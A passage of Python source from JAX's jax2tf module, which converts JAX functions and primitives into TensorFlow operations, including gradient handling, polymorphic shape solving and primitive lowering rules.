def converted_grad_fn(*out_cts_flat: TfVal,
_out_cts_avals: Sequence[core.AbstractValue],
variables=None):
if variables:
raise ValueError("Unexpected variables used in forward pass. "
"This should not happen for first-order differentiation. "
f"variables={variables}")
def fun_vjp_jax(args_jax, out_cts_jax):
# One may think that we can get the pullback while we are converting
# the main function in the first place. That is problematic, because the
# pullback may contain captured tracers from the conversion of the
# main function. Those tracers will confuse the conversion of the
# pullback. So, we construct the vjp anew.
_, pullback_jax = jax.vjp(fun, *args_jax)
return pullback_jax(out_cts_jax)
if in_shapes is None:
vjp_in_shapes = None
else:
args_in_shapes = tree_util.tree_unflatten(in_tree.children()[0], in_shapes_flat)
out_cts_in_shapes = tree_util.tree_unflatten(
out_tree_thunk(),
tuple(str(out_aval.shape) for out_aval in _out_cts_avals)) # type: ignore
vjp_in_shapes = [args_in_shapes, out_cts_in_shapes]
out_cts = tree_util.tree_unflatten(out_tree_thunk(), out_cts_flat)
# TODO: enable higher-order gradients
with tf.name_scope("jax2tf_vjp"):
in_cts = convert(fun_vjp_jax, with_gradient=False,
in_shapes=vjp_in_shapes)(args, out_cts)
return in_cts
try:
global _shape_env
assert not _shape_env, f"Unexpected shape environment {_shape_env}"
_shape_env = _make_shape_env(args_avals_flat, args_flat)
if with_gradient:
@tf.custom_gradient
def converted_fun_flat_with_custom_gradient(*args_flat: TfVal) -> TfVal:
out_with_avals = _interpret_fun(flat_fun, args_flat, args_avals_flat)
outs, out_avals = util.unzip2(out_with_avals)
return (tuple(outs),
functools.partial(converted_grad_fn, _out_cts_avals=tuple(out_avals)))
out_flat = converted_fun_flat_with_custom_gradient(*args_flat)
else:
out_flat_raw = _interpret_fun(flat_fun, args_flat, args_avals_flat)
message = ("The jax2tf-converted function does not support gradients. "
"Use `with_gradient` parameter to enable gradients")
# We use PreventGradient, which is propagated through a SavedModel.
out_flat = [tf.raw_ops.PreventGradient(input=o, message=message)
for o, _ in out_flat_raw]
finally:
_shape_env = {}
out_flat = [tf.identity(x, "jax2tf_out") for x in out_flat]
out = tree_util.tree_unflatten(out_tree_thunk(), out_flat)
return out
return converted_fun
# Internals
def _interpret_fun(fun: lu.WrappedFun,
in_vals: Sequence[TfVal],
in_avals: Sequence[core.AbstractValue]
) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
new_main = core.new_base_main if config.omnistaging_enabled else core.new_main
with new_main(TensorFlowTrace) as main: # type: ignore
fun = _interpret_subtrace(fun, main, in_avals)
out_vals: Sequence[Tuple[TfVal, core.AbstractValue]] = fun.call_wrapped(*in_vals)
del main
return tuple(out_vals)
def _convert_jax_impl(jax_impl: Callable, *, multiple_results=True) -> Callable:
"""Convert the JAX implementation of a primitive.
Args:
jax_impl: typically the impl-rule for a primitive, with signature
`(*args: JaxVal, **kwargs) -> Sequence[JaxVal]`. This function implements
a primitive in terms of other primitives.
multiple_results: whether `jax_impl` returns a sequence of results.
Returns:
a function with signature `(*args: TfVal, _in_avals, _out_aval, **kwargs) -> Sequence[TfVal]`.
"""
def wrapped(*tf_args: TfVal,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue, **kwargs) -> Sequence[TfVal]:
# We wrap the jax_impl under _interpret_fun to abstract the TF values
# from jax_impl and turn them into JAX abstract values.
def jax_impl_jax_args(*jax_args):
jax_results = jax_impl(*jax_args, **kwargs)
return jax_results if multiple_results else [jax_results]
tf_results_with_avals = _interpret_fun(lu.wrap_init(jax_impl_jax_args), tf_args, _in_avals)
tf_results, _ = util.unzip2(tf_results_with_avals)
return tf_results if multiple_results else tf_results[0]
return wrapped
@lu.transformation
def _interpret_subtrace(main: core.MainTrace,
in_avals: Sequence[core.AbstractValue],
*in_vals: TfVal):
trace = TensorFlowTrace(main, core.cur_sublevel())
in_tracers = tuple(TensorFlowTracer(trace, val, aval)
for val, aval in util.safe_zip(in_vals, in_avals))
# The outs may be core.unit, see comment in TensorFlowTrace.pure.
outs = yield in_tracers, {} # type: Sequence[Union[TfVal, core.Unit]]
out_tracers: Iterable[TensorFlowTracer] = map(trace.full_raise, outs) # type: ignore
out_vals_with_avals: Sequence[Tuple[TfVal, core.AbstractValue]] = (
tuple((t.val, t.aval) for t in out_tracers))
yield out_vals_with_avals
def _interpret_jaxpr(jaxpr: core.ClosedJaxpr, *args: TfVal) -> Sequence[TfVal]:
"""Evaluates a Jaxpr with tf.Tensor arguments.
The output is a sequence of TfVal (no `core.unit`), suitable for use with TF.
"""
fun: lu.WrappedFun = lu.wrap_init(core.jaxpr_as_fun(jaxpr))
out_with_avals = _interpret_fun(fun, args, jaxpr.in_avals)
return tuple(v for v, _ in out_with_avals)
### tracer
PolyDim = Union[int, masking.Poly] # A polymorphic shape dimension
def _poly_dim_to_tf_dim(dim: PolyDim) -> Optional[int]:
if isinstance(dim, int):
return dim
elif dim.is_constant:
return int(dim)
else:
return None
def _aval_to_tf_shape(aval: core.AbstractValue) -> Tuple[Optional[int], ...]:
"""Generate a TF shape, possibly containing None for polymorphic dimensions."""
return tuple(map(_poly_dim_to_tf_dim, aval.shape)) # type: ignore[attr-defined]
def _tfval_shape_dtype(val: TfVal) -> Tuple[Sequence[Optional[int]], DType]:
"""
Called for constants that occur in the program, or for input values to the
converted function. The returned shape may have unknown components, but
only when called for inputs.
"""
if isinstance(val, (tf.Tensor, tf.Variable)):
# May be partially known
return tuple(val.shape), to_jax_dtype(val.dtype)
else: # Must be a numeric value
assert core.skip_checks or _is_tfval(val), f"Non TfVal: {val}"
raw_aval = xla.abstractify(val)
return raw_aval.shape, raw_aval.dtype # type: ignore[attr-defined]
def _input_avals(args: Sequence[TfVal], in_shapes: Sequence[Optional[str]]) -> Sequence[core.AbstractValue]:
"""Abstract values for the input arguments."""
def input_aval(arg: TfVal, in_shape: Optional[str]) -> core.AbstractValue:
"""The abstract value for an input."""
raw_shape, dtype = _tfval_shape_dtype(arg)
if in_shape is None:
if any(d is None for d in raw_shape):
msg = ("in_shape must be specified when the argument "
f"shape {raw_shape} is partially known.")
raise TypeError(msg)
else:
return core.ShapedArray(raw_shape, dtype)
in_shape_spec = masking.parse_spec(in_shape)
if len(in_shape_spec) != len(raw_shape):
msg = (f"in_shape {in_shape} has different rank than actual argument "
f"shape {raw_shape}")
raise TypeError(msg)
try:
# TODO: improve finalize_spec error reporting, so we don't have to code our own
shape = masking.finalize_spec(in_shape_spec, raw_shape)
except TypeError:
msg = (f"in_shape {in_shape} has `_` placeholders for argument shape "
f"dimensions that are unknown: {raw_shape}")
raise TypeError(msg)
for dim_idx, (s, raw_s) in enumerate(util.safe_zip(shape, raw_shape)):
s_int: Optional[int] = _poly_dim_to_tf_dim(s)
if s_int != raw_s and s_int is not None:
msg = (f"in_shape {in_shape} (resolved to {shape}) does not match "
f"argument shape {raw_shape} in dimension {dim_idx}")
raise TypeError(msg)
return core.ShapedArray(shape, dtype)
return tuple(map(input_aval, args, in_shapes))
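# A minimal illustrative sketch (the helper below is hypothetical and not used
# by the converter; it relies on the module-level `tf` import): it shows how
# `_input_avals` pairs a concrete TF argument with an optional polymorphic
# shape specification such as "(b, 4)".
def _example_input_avals():
  arg = tf.zeros((3, 4), dtype=tf.float32)
  # Without a spec the abstract value mirrors the concrete shape.
  aval_static, = _input_avals([arg], [None])    # ShapedArray((3, 4), float32)
  # With "(b, 4)" the first dimension becomes the shape variable `b`, and the
  # second dimension is checked against the actual size 4.
  aval_poly, = _input_avals([arg], ["(b, 4)"])  # ShapedArray((b, 4), float32)
  return aval_static, aval_poly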
# A shape environment maps shape variables to TfVal.
ShapeEnv = Dict[str, TfVal]
_shape_env = {} # type: ShapeEnv
def _eval_shape(shape: Sequence[PolyDim]) -> Sequence[TfVal]:
assert all(map(lambda x: x is not None, shape)), (
f"Argument shape should be a valid JAX shape but got {shape}")
return masking.eval_poly_shape(shape, _shape_env)
# Extracting a shape environment by solving the shape variables.
# The shape environment will be derived by using `tf.shape` from the
# dynamic shape of arguments, not their static shape.
def _make_shape_env(args_avals: Sequence[core.AbstractValue],
args: Sequence[TfVal]) -> Dict[str, TfVal]:
eqns = [(p, tf.shape(a)[i])
for a_aval, a in util.safe_zip(args_avals, args)
for i, p in enumerate(a_aval.shape)]
return _solve_shape_vars(eqns)
ShapeEqn = Tuple[PolyDim, TfVal]
def _solve_shape_vars(eqns: Sequence[ShapeEqn]) -> Dict[str, TfVal]:
"""Solves a number of equations "poly = tfval" into an shape environment."""
# A simple variable elimination algorithm for now
solved: Dict[str, TfVal] = {} # Already solved vars
def simplify_poly(p: PolyDim) -> Optional[Union[TfVal,
Tuple[str, TfVal, TfVal]]]:
# Simplifies polynomial given `solved`
# Returns (v, f, rest) such that p = v * f + rest, or
# rest such that p = rest, or None
v = None
f = None
rest = []
if isinstance(p, int):
return tf.constant(p)
for m, m_factor in p.items():
simpl_m: Union[str, TfVal] = simplify_mon(m, p)
if isinstance(simpl_m, str): # A var
if v is not None:
return None
v = simpl_m
f = m_factor
else: # A value
rest.append(tf.math.multiply(simpl_m, m_factor))
rest_val = functools.reduce(tf.math.add, rest, tf.constant(0))
return rest_val if v is None else (v, f, rest_val)
def simplify_mon(m: masking.Mon, in_poly: masking.Poly) -> Union[str, TfVal]:
# Simplifies monomial given `solved`
# Returns either a variable, or a solved value
if not m:
return tf.constant(1)
if m.degree > 1:
msg = ("only linear polynomials are supported as input shape "
f"specifications. Found '{m}' in '{in_poly}'.")
raise TypeError(msg)
var = list(m.keys())[0]
return solved.get(var, var)
remaining = eqns
while remaining:
new_remaining = []
for eqn in remaining:
eq_p, eq_val = eqn
p_simpl = simplify_poly(eq_p)
if p_simpl is None:
new_remaining.append(eqn)
continue
if not isinstance(p_simpl, tuple):
# TODO: add an assertion rest == eq_v
continue
var, factor, rest = p_simpl
# p = var * factor + rest
# TODO: add an assertion eq_v >= rest and (eq_v - rest) mod factor == 0
solved[var] = tf.math.floordiv(tf.math.subtract(eq_val, rest), factor)
if len(new_remaining) < len(remaining):
remaining = new_remaining
else:
msg = "Cannot solve"
raise ValueError(msg)
return solved
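# A small sketch of how the solver above is used (the helper is hypothetical
# and relies on the module-level `tf` import). For an argument declared as
# "(b, 4)" the equations are roughly `b == tf.shape(arg)[0]` and
# `4 == tf.shape(arg)[1]`; eliminating the single variable yields a shape
# environment mapping "b" to a TF scalar.
def _example_shape_env():
  arg = tf.zeros((3, 4), dtype=tf.float32)
  avals = _input_avals([arg], ["(b, 4)"])
  return _make_shape_env(avals, [arg])  # roughly {"b": <tf.Tensor: 3>}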
def shape_as_value(x):
"""Injects the shape of `x` as an array value.
**Experimental: please give feedback, and expect changes!**
This allows the use of a shape expression as array argument to JAX functions.
A typical example is for implementing a mean operation:
jnp.sum(x) / np.prod(jax2tf.shape_as_value(x))
"""
return shape_as_value_p.bind(x)
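# A usage sketch for the docstring example above (hypothetical helper, relying
# on the module-level `jnp` and `np` imports): the shape participates as array
# values, so the mean also works when dimensions are polymorphic.
def _example_mean_with_shape_as_value(x):
  return jnp.sum(x) / np.prod(shape_as_value(x))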
# TODO: move this to masking or to some common library, if approved
shape_as_value_p = core.Primitive("shape_as_value")
shape_as_value_p.multiple_results = True
def _shape_as_value_impl(x):
x_shape = np.shape(x)
def dim_to_int(dim: PolyDim) -> int:
dim_int = _poly_dim_to_tf_dim(dim)
if dim_int is None:
msg = ("shape_as_value is not implemented for non-constant shapes "
"except for masking and jax2tf. "
f"Has shape: {x_shape}")
raise TypeError(msg)
else:
return dim_int
return tuple(map(dim_to_int, x_shape))
shape_as_value_p.def_impl(_shape_as_value_impl)
def _shape_as_value_abstract(x_aval: core.AbstractValue) -> Sequence[core.AbstractValue]:
rank = len(x_aval.shape) # type: ignore[attr-defined]
return (core.ShapedArray((), dtypes.canonicalize_dtype(np.int_), weak_type=True),) * rank
shape_as_value_p.def_abstract_eval(_shape_as_value_abstract)
def _shape_as_value_translation(comp, x):
return xla_client._xla.ops.Tuple(comp,
tuple(xb.constant(comp, d)
for d in comp.GetShape(x).dimensions()))
xla.translations[shape_as_value_p] = _shape_as_value_translation
def _shape_as_value_jvp_rule(primals, tangents):
# The shape does not depend on the contents of the input
x, = primals
zero = ad.Zero.from_value(0.)
return shape_as_value(x), (zero,) * len(x.shape)
ad.primitive_jvps[shape_as_value_p] = _shape_as_value_jvp_rule
def _shape_as_value__batching_rule(batched_args, batch_dims):
xv, = batched_args
batch_dim, = batch_dims
batch_size = xv.shape[batch_dim]
batched_shape = shape_as_value(xv)
one_shape = batched_shape[0:batch_dim] + batched_shape[batch_dim+1:]
res = tuple(jnp.broadcast_to(d, (batch_size, 1)) for d in one_shape)
return res, (0,) * len(one_shape)
batching.primitive_batchers[shape_as_value_p] = _shape_as_value__batching_rule
def _shape_as_value_masking_rule(operands, operands_logical_shapes):
x_logical_shape, = operands_logical_shapes
return tuple(x_logical_shape)
masking.masking_rules[shape_as_value_p] = _shape_as_value_masking_rule
def _shape_as_value_tf(x: TfVal,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue) -> TfVal:
x_aval = _in_avals[0]
def dim_to_tfval(dim: PolyDim, dim_idx: int) -> TfVal:
dim_int = _poly_dim_to_tf_dim(dim)
if dim_int is not None:
return tf.convert_to_tensor(dim_int)
else:
return tf.shape(x)[dim_idx]
return tuple(dim_to_tfval(dim, dim_idx)
for dim_idx, dim in enumerate(x_aval.shape)) # type: ignore[attr-defined]
tf_impl_with_avals[shape_as_value_p] = _shape_as_value_tf
# TODO(b/26854495): pylint doesn't understand slots and inheritance.
# pylint: disable=assigning-non-slot
class TensorFlowTracer(core.Tracer):
"""Tracer class that boxes a TF value and a JAX abstract value.
In addition to the TF value we carry the JAX abstract value because there are
two cases when it cannot be recovered from the value: (a) when the abstract
value is core.abstract_unit, in which case the value is tf.nan; (b) when we
are converting with polymorphic shapes, in which case the shape of the value
  may have dimensions set to `None`, for which the JAX abstract value contains
more precise information.
When the value has a partially-known shape, the dimensions marked as `None`
must correspond to non-constant dimensions in the abstract value.
See README.md for details.
"""
# val: TfVal
# _aval: core.AbstractValue
__slots__ = ["val", "_aval"]
def __init__(self, trace: 'TensorFlowTrace', val: TfVal,
aval: core.AbstractValue):
self._trace = trace
self._aval = aval
if aval is core.abstract_unit:
self.val = val
elif isinstance(val, (tf.Tensor, tf.Variable)):
val_shape, val_dtype = _tfval_shape_dtype(val)
aval_dtype = np.dtype(self._aval.dtype) # type: ignore[attr-defined]
if val_dtype != aval_dtype and (val_dtype == tf.int32 and aval_dtype == jnp.int64 or
val_dtype == tf.int64 and aval_dtype == jnp.int32 or
val_dtype == tf.float32 and aval_dtype == jnp.float64 or
val_dtype == tf.float64 and aval_dtype == jnp.float32):
# We expect that x64 values are turned into x32
val = tf.cast(val, dtype=aval_dtype)
val_dtype = aval_dtype
if not core.skip_checks:
assert aval_dtype == val_dtype, f"expected {aval_dtype} == {val_dtype}"
for aval_dim, val_dim in util.safe_zip(self._aval.shape, val_shape): # type: ignore[attr-defined]
if val_dim is None:
assert isinstance(aval_dim, masking.Poly), f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
elif not isinstance(aval_dim, masking.Poly):
assert aval_dim == val_dim, f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
else:
        # We have a TF value with known shape, and the abstract shape is a polynomial.
        # As an extra check, verify the value if the shape env contains only constants.
try:
aval_int = int(masking.eval_poly(aval_dim, _shape_env))
except TypeError:
continue
assert aval_int == val_dim, f"expected {self._aval.shape} == {val_shape}. Found {aval_int} != {val_dim}." # type: ignore
self.val = val
else: # Must be a numeric value
self.val = _safe_convert_to_tensor(val, dtype=self._aval.dtype) # type: ignore[attr-defined]
@property
def aval(self):
return self._aval
def full_lower(self):
return self
class TensorFlowTrace(core.Trace):
"""Trace class that underlies the jax2tf transformation.
We are going to ensure that jax2tf.convert is never nested inside other
transformations. This is sufficient for intended use cases (converting
fully-transformed JAX code). It also simplifies our job because we do not have
to handle situations where we apply primitives on a mix of TF values and
JAX tracers from an outer transformation. E.g., for addition both the TF values
and the JAX tracers have an override and they get confused if they see values
from the other world.
Hence a TFT trace does not interact with non-TFT traces at lower-level. For
higher-order control-flow primitives we invoke recursively
_interpret_fun on the body of the conditional, which will create a nested TFT.
We do want to allow transformations nested inside a TensorFlowTrace (TFT), but
those will introduce their own MainTrace, and any operations involving those
will be done on those traces, i.e., not a concern for TFT.
"""
def pure(self, val: Union[TfVal, core.Unit]) -> TensorFlowTracer:
"""Lifts a non-Tracer into the TensorFlowTracer.
This function may be called by way of trace.full_raise.
The value may be a core.unit. During JAX transformations we sometimes
produce a Jaxpr that has arguments of abstract value core.abstract_unit
and results equal to core.unit. These are arguments and results that are
not used in the computation.
In TF world, we represent core.unit as NaN. This is safe, as these values
should never be used.
"""
if val is core.unit:
return TensorFlowTracer(self, tf.constant(np.nan, tf.float32), core.abstract_unit)
else:
shape, dtype = _tfval_shape_dtype(val)
return TensorFlowTracer(self, val, core.ShapedArray(shape, dtype))
def lift(self, val: core.Tracer) -> TensorFlowTracer:
# This would be called when we need to raise a tracer from a lower-level
# main into the TensorFlowTrace. Since the TensorFlowTrace is never nested
# inside another transform, there are no lower-level main traces.
assert False
def sublift(self, val: TensorFlowTracer) -> TensorFlowTracer:
    # This is called when we need to raise a tracer from the same main trace,
# but a lower sublevel. This could come from a nested jit.
return TensorFlowTracer(self, val.val, val._aval)
def process_primitive(self, primitive: core.Primitive,
tracers: Sequence[TensorFlowTracer],
params) -> TensorFlowTracer:
impl, impl_needs_avals = self.get_primitive_impl(primitive)
args_avals: Sequence[core.AbstractValue] = tuple(t.aval for t in tracers)
out_aval = primitive.abstract_eval(*args_avals, **params)
args_tf: Sequence[TfVal] = [t.val for t in tracers]
if impl_needs_avals:
val_out: TfVal = impl(*args_tf, _in_avals=args_avals, # type: ignore
_out_aval=out_aval, **params)
else:
val_out = impl(*args_tf, **params)
if primitive.multiple_results:
out = [TensorFlowTracer(self, v, a)
for v, a in util.safe_zip(val_out, out_aval)] # type: ignore
else:
out = TensorFlowTracer(self, val_out, out_aval) # type: ignore
# Check that the impl rule returned a value of expected shape and dtype
# TODO: adapt this to match polymorphic shapes
if not core.skip_checks:
if primitive.multiple_results:
for o, expected_aval in zip(out, out_aval): # type: ignore
assert o.aval.strip_weak_type() == expected_aval.strip_weak_type(), (
f"{primitive}: out.aval = {o.aval}; expected {expected_aval}")
else:
assert out.aval == out_aval, ( # type: ignore
f"{primitive}: out.aval = {out.aval}; expected {out_aval}") # type: ignore
return out # type: ignore
def process_call(self, call_primitive: core.Primitive, f: lu.WrappedFun,
tracers: Sequence[TensorFlowTracer], params):
assert call_primitive.multiple_results
vals: Sequence[TfVal] = [t.val for t in tracers]
f = _interpret_subtrace(f, self.main, tuple(t.aval for t in tracers))
if call_primitive == core.named_call_p:
with tf.name_scope(_sanitize_scope_name(params["name"])):
vals_out: Sequence[Tuple[TfVal,
core.AbstractValue]] = f.call_wrapped(*vals)
elif call_primitive == sharded_jit.sharded_call_p:
vals_out = _sharded_call(f, vals, **params)
else:
vals_out = f.call_wrapped(*vals)
return [TensorFlowTracer(self, v, a) for v, a in vals_out]
def post_process_call(self, call_primitive: core.Primitive,
out_tracers: Sequence[TensorFlowTracer], params):
    # We encountered a call primitive, e.g., remat_call_p, whose results
    # (out_tracers) include TensorFlowTracers that were not passed through
    # its arguments (they were captured from the environment).
vals = tuple(t.val for t in out_tracers)
main = self.main
def todo(vals: Sequence[TfVal]):
trace = TensorFlowTrace(main, core.cur_sublevel())
return [TensorFlowTracer(trace, v, out_tracer.aval)
for v, out_tracer in util.safe_zip(vals, out_tracers)]
return vals, todo
def process_map(self, map_primitive, f, tracers, params):
raise NotImplementedError("process_map")
def post_process_map(self, map_primitive, out_tracers, params):
raise NotImplementedError("post_process_map")
def process_custom_jvp_call(self, prim, fun, jvp, tracers):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del jvp # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_jvp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del fwd, bwd, out_trees # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_vjp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def get_primitive_impl(self, p: core.Primitive) -> Tuple[Callable, bool]:
# Returns the primitive implementation and whether the implementation
# takes abstract values (see definition of tf_impl_with_avals)
try:
return tf_impl[p], False
except KeyError:
try:
return tf_impl_with_avals[p], True
except KeyError as err:
msg = "TensorFlow interpretation rule for '{}' not implemented"
raise NotImplementedError(msg.format(p)) from err
def to_tf_dtype(jax_dtype):
if jax_dtype == dtypes.float0:
return tf.float32
else:
return tf.dtypes.as_dtype(jax_dtype)
def to_jax_dtype(tf_dtype):
return tf_dtype.as_numpy_dtype
def _unexpected_primitive(p: core.Primitive, *args, **kwargs):
assert False, f"Encountered unexpected primitive {p}"
for unexpected in xla.call_translations: # Call primitives are inlined
tf_impl[unexpected] = functools.partial(_unexpected_primitive, unexpected)
# Primitives that are not yet implemented must be explicitly declared here.
tf_not_yet_impl = [
"reduce", "rng_uniform",
"igamma_grad_a",
"random_gamma_grad",
# Not high priority?
"after_all", "all_to_all", "create_token",
"infeed", "outfeed", "pmax_p",
"pmin", "ppermute", "psum", "pmax", "pgather",
"axis_index", "pdot", "all_gather",
"xla_pmap",
"call_tf",
]
try:
tf_impl[lax.tie_in_p] = lambda x, y: y
except AttributeError:
pass
tf_impl[ad_util.stop_gradient_p] = tf.stop_gradient
tf_impl[ad_util.zeros_like_p] = tf.zeros_like
def _add(x: TfVal, y: TfVal) -> TfVal:
return tf.raw_ops.AddV2(x=x, y=y)
tf_impl[ad_util.add_jaxvals_p] = _add
tf_impl[xla.device_put_p] = lambda x, device=None: x
tf_impl[lax.neg_p] = tf.math.negative
tf_impl[lax.sign_p] = tf.math.sign
tf_impl[lax.floor_p] = tf.math.floor
tf_impl[lax.ceil_p] = tf.math.ceil
def _round(operand, *, rounding_method):
if rounding_method is lax.RoundingMethod.AWAY_FROM_ZERO:
sign = tf.math.sign(operand)
operand *= sign
floor = tf.math.floor(operand)
operand -= floor
cond = tf.math.equal(operand, tf.constant(np.array(0.5), operand.dtype))
return sign * (tf.where(cond, tf.constant(np.array(1), operand.dtype),
tf.math.round(operand)) + floor)
else:
return tf.math.round(operand)
tf_impl[lax.round_p] = _round
tf_impl[lax.nextafter_p] = tf.math.nextafter
def _population_count(x):
orig_dtype = x.dtype
return tf.cast(tf.raw_ops.PopulationCount(x=x), orig_dtype)
tf_impl[lax.population_count_p] = _population_count
tf_impl[lax.is_finite_p] = tf.math.is_finite
tf_impl[lax.abs_p] = tf.math.abs
tf_impl[lax.pow_p] = tf.math.pow
tf_impl[lax.integer_pow_p] = tf.math.pow
tf_impl[lax.exp_p] = tf.math.exp
tf_impl[lax.expm1_p] = tf.math.expm1
tf_impl[lax.log_p] = tf.math.log
tf_impl[lax.log1p_p] = tf.math.log1p
tf_impl[lax.tan_p] = tf.math.tan
tf_impl[lax.tanh_p] = tf.math.tanh
tf_impl[lax.sin_p] = tf.math.sin
tf_impl[lax.sinh_p] = tf.math.sinh
tf_impl[lax.cos_p] = tf.math.cos
tf_impl[lax.cosh_p] = tf.math.cosh
tf_impl[lax.acos_p] = tf.math.acos
tf_impl[lax.asin_p] = tf.math.asin
tf_impl[lax.atan_p] = tf.math.atan
tf_impl[lax.atan2_p] = tf.math.atan2
tf_impl[lax.acosh_p] = tf.math.acosh
tf_impl[lax.atanh_p] = tf.math.atanh
tf_impl[lax.asinh_p] = tf.math.asinh
tf_impl[lax.sqrt_p] = tf.math.sqrt
tf_impl[lax.rsqrt_p] = tf.math.rsqrt
tf_impl[lax.lgamma_p] = tf.math.lgamma
tf_impl[lax.digamma_p] = tf.math.digamma
tf_impl[lax.igamma_p] = tf.math.igamma
tf_impl[lax.igammac_p] = tf.math.igammac
tf_impl[lax.regularized_incomplete_beta_p] = tf.math.betainc
tf_impl[lax.erf_p] = tf.math.erf
tf_impl[lax.erfc_p] = tf.math.erfc
tf_impl[lax.erf_inv_p] = tf.math.erfinv
tf_impl[lax.bessel_i0e_p] = tf.math.bessel_i0e
tf_impl[lax.bessel_i1e_p] = tf.math.bessel_i1e
tf_impl[lax.complex_p] = tf.complex
def _conj(x, **kwargs):
# The only dtypes that are allowed are: float32, float64, complex64, and
# complex128.
if x.dtype == tf.float32:
return tf.cast(x, tf.complex64)
elif x.dtype == tf.float64:
return tf.cast(x, tf.complex128)
else:
return tf.math.conj(x)
tf_impl[lax.conj_p] = _conj
tf_impl[lax.real_p] = tf.math.real
tf_impl[lax.imag_p] = tf.math.imag
tf_impl[lax.add_p] = _add
tf_impl[lax.sub_p] = tf.math.subtract
tf_impl[lax.mul_p] = tf.math.multiply
def _iota(*, dtype, shape, dimension):
dtype = to_tf_dtype(dtype)
# Some dtypes are unsupported, like uint32, so we just fall back to int32.
# TODO(mattjj, necula): improve tf.range dtype handling
shape_tf = _eval_shape(shape)
vec = tf.range(tf.cast(shape_tf[dimension], tf.int32), dtype=tf.int32)
vec_shape = [-1 if i == dimension else 1 for i in range(len(shape))]
return tf.cast(tf.broadcast_to(tf.reshape(vec, vec_shape), shape_tf), dtype)
tf_impl[lax.iota_p] = _iota
def _div(lhs, rhs):
if lhs.dtype.is_integer:
quotient = tf.math.floordiv(lhs, rhs)
select = tf.math.logical_and(
tf.not_equal(tf.math.sign(lhs), tf.math.sign(rhs)),
tf.not_equal(tf.math.floormod(lhs, rhs), 0))
return tf.where(select, quotient + 1, quotient)
else:
return tf.math.truediv(lhs, rhs)
def _rem(lhs, rhs):
return tf.math.sign(lhs) * tf.math.floormod(tf.math.abs(lhs),
tf.math.abs(rhs))
tf_impl[lax.div_p] = _div
tf_impl[lax.rem_p] = _rem
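# Illustrative sketch (hypothetical helper, relying on the module-level `tf`
# import): for integers, lax.div truncates toward zero, while tf.math.floordiv
# rounds toward negative infinity; `_div` adds 1 to the quotient exactly when
# the signs differ and the division is inexact.
def _example_integer_div():
  lhs = tf.constant([-7, 7, -7, 7], dtype=tf.int32)
  rhs = tf.constant([2, -2, -2, 2], dtype=tf.int32)
  # tf.math.floordiv(lhs, rhs) -> [-4, -4, 3, 3]
  # _div(lhs, rhs)             -> [-3, -3, 3, 3]  (truncation, as in lax.div)
  return _div(lhs, rhs)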
tf_impl[lax.max_p] = tf.math.maximum
tf_impl[lax.min_p] = tf.math.minimum
# Map from TF signed types to TF unsigned types.
_SIGNED_TO_UNSIGNED_TABLE = {
tf.int8: tf.uint8,
tf.int16: tf.uint16,
tf.int32: tf.uint32,
tf.int64: tf.uint64,
}
# Map from TF unsigned types to TF signed types.
_UNSIGNED_TO_SIGNED_TABLE = {u: s for s, u in _SIGNED_TO_UNSIGNED_TABLE.items()}
# Note: Bitwise operations only yield identical results on unsigned integers!
# pylint: disable=protected-access
def _shift_right_arithmetic_raw(x, y):
if x.dtype.is_unsigned:
assert x.dtype == y.dtype
orig_dtype = x.dtype
signed_dtype = _UNSIGNED_TO_SIGNED_TABLE[orig_dtype]
x = tf.cast(x, signed_dtype)
y = tf.cast(y, signed_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
else:
return tf.bitwise.right_shift(x, y)
def _shift_right_arithmetic(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA
# semantics to return the shift by the max value (x_bits - 1).
# TODO: it is likely better to add XlaOps for shifts
x_bits = 8 * x.dtype.size
clamp_y = tf.where(_shift_in_bounds(x, y), y, x_bits - 1)
return _shift_right_arithmetic_raw(x, clamp_y)
tf_impl[lax.shift_right_arithmetic_p] = _shift_right_arithmetic
def _shift_right_logical_raw(x, y):
if x.dtype.is_unsigned:
return tf.bitwise.right_shift(x, y)
else:
assert x.dtype == y.dtype
orig_dtype = x.dtype
unsigned_dtype = _SIGNED_TO_UNSIGNED_TABLE[orig_dtype]
x = tf.cast(x, unsigned_dtype)
y = tf.cast(y, unsigned_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
def _shift_right_logical(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(_shift_in_bounds(x, y),
_shift_right_logical_raw(x, y),
tf.zeros_like(x))
tf_impl[lax.shift_right_logical_p] = _shift_right_logical
def _shift_left(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(_shift_in_bounds(x, y),
tf.bitwise.left_shift(x, y),
tf.zeros_like(x))
tf_impl[lax.shift_left_p] = _shift_left
def _shift_in_bounds(x: TfVal, y: TfVal) -> TfVal:
# Return the TF expression for when y is within bounds (0 <= y < |x|)
x_bits = 8 * x.dtype.size
# TF does not have comparisons for uint16 and uint32 (despite what the
# documentation says)
y_comp = tf.cast(y, _UNSIGNED_TO_SIGNED_TABLE[y.dtype]) if y.dtype.is_unsigned else y
y_lt_x_bits = tf.math.less(y_comp, x_bits)
y_ge_0 = tf.math.greater_equal(y_comp, 0)
return tf.logical_and(y_lt_x_bits, y_ge_0)
def _not(x):
"""Computes bitwise not with support for booleans.
Numpy and JAX support bitwise not for booleans by applying a logical not!
  This means that applying bitwise_not yields an unexpected result:
jnp.bitwise_not(jnp.array([True, False]))
